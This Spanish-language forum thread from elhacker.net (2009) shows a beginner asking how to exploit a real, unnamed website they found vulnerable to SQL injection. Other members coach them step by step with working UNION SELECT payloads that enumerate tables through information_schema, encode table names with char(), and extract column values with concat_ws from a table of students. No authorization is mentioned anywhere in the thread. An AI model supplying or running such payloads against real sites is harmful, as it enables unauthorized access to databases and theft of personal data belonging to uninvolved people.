elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  duda sql injection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda sql injection  (Leído 4,413 veces)
emma93

Desconectado Desconectado

Mensajes: 33


Ver Perfil
duda sql injection
« en: 27 Septiembre 2009, 20:02 pm »

bueno, resulta que tengo un problema.

soy nuevo en todo esto del hacking, digamos :P

y encontré una web vulnerable a sql, el tema es que le hago order by, para saber el número de columnas.

Llegué a la conclusión que tiene 12 columnas. Bien, ahora el tema es hacerle union select.

Hice -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12

Pero tengo un problema, no se el nombre de las tablas ni de las columnas.

Estos nombres hay alguna forma de saberlos ? O es cuestión de probar ?

He probado con los mas comunes (user, users, usuarios, register, registers, members, member, usr, usrs, etc..) Pero no funca ninguno.

Espero que alguno me saque la duda, saludos !

:)
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: duda sql injection
« Respuesta #1 en: 27 Septiembre 2009, 20:31 pm »

mira la version()
si es mas de 5.* existe information_schema , si no , obligado a adivinar la tabla
donde printea en la web

group_concat(table_name),3,4,5,6....+from+information_schema.tables--

para la columna
group_concat(columns_name),3,4,5,6...from+information_schema.columns+where+table_name=char( tabla en ascii)--..

x hai kien dice yte sirve eso:xD
saludos
En línea

emma93

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: duda sql injection
« Respuesta #2 en: 27 Septiembre 2009, 21:58 pm »

Bien, he podido sacar el nombre de todas las tablas mediante el information_schema.tables

Ahora he intentado con el concat(columns_name), pero no se que poner al final (donde dice char).

Que se supone que tengo que poner ahi ?

Espero que puedas ayudarme, y gracias.

Saludos :)
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: duda sql injection
« Respuesta #3 en: 27 Septiembre 2009, 22:08 pm »

A ver, cada tabla tiene sus columnas.

Entonces tu eliges la tabla a la que le quieres ver las columnas.

Entonces imagina que el nombre de la tabla que quieres ver es usuarios.

Pues coges un conversor y lo pasas a ASCII y listo:

Código:
..group_concat(column_name)...+from+information_schema.columns+where+table_name=char(117,115,117,97,114,105,111,115)--

Y te muestra sus columnas :)
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
emma93

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: duda sql injection
« Respuesta #4 en: 27 Septiembre 2009, 22:46 pm »

***.php?pagina=1&id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(97,108,109,110,111,115)

He visto y el 3, el 5, y el 9 son vulnerables.

Intento hacerlo en el 3,5 o 9 y siempre me pasa lo mismo.

Tengo una tabla llamada alumnos. Pero al hacer esto no me devuelve las columnas. Lo unico que hace es que desaparezca el numero (vulnerable), sin aparecer ninguna información.

No se si me explico.
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: duda sql injection
« Respuesta #5 en: 27 Septiembre 2009, 23:01 pm »

Tu pusiste "almnos" ;D

Prueba este:

Código:
-1+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(97,108,117,109,110,111,115)--


Saludos ;)
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
emma93

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: duda sql injection
« Respuesta #6 en: 27 Septiembre 2009, 23:11 pm »

Listo, ahi me devolvió las columnas de una determinada tabla :)

Ahora una última pregunta. Como hago para saber el valor de una columna ?
En línea

08l00D

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: duda sql injection
« Respuesta #7 en: 27 Septiembre 2009, 23:20 pm »

Código:
-1+union+select+1,2,3,4,nombrecolumna,6,7,8,9,10,11,12+from+alumnos+limit+0,1--
si queres saber el valor de varias a la vez las concatenas...
Código:
-1+union+select+1,2,3,4,concat_ws(0x3a,nomnbrecolumna,otronombrecolumna,etc),6,7,8,9,10,11,12+from+alumnos+limit+0,1--

En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: duda sql injection
« Respuesta #8 en: 28 Septiembre 2009, 20:46 pm »

Código:
-1+union+all+select+0,1,concat(columna,0x3a,columna),3,4+from+tabla--

Suponiendo que salto el numero 2
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
(DUDA) Haciendo SQL Injection. « 1 2 »
Nivel Web
flowskull 16 9,878 Último mensaje 1 Abril 2012, 23:57 pm
por afdlkglfgfdgfhgf
Duda con Sql Injection en Sql Map
Nivel Web
Blackhawk222 3 3,213 Último mensaje 14 Febrero 2012, 11:24 am
por cibergolen
[DUDA] DNS SQL Injection
Hacking
parentesco 1 3,167 Último mensaje 25 Mayo 2012, 20:03 pm
por toxeek
Duda sobre sql injection
Nivel Web
Mapcimus 2 3,290 Último mensaje 20 Julio 2013, 02:42 am
por Mapcimus
Xss injection & sql injection pequeña duda.
Nivel Web
6666 6 3,864 Último mensaje 12 Septiembre 2014, 07:27 am
por 6666
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines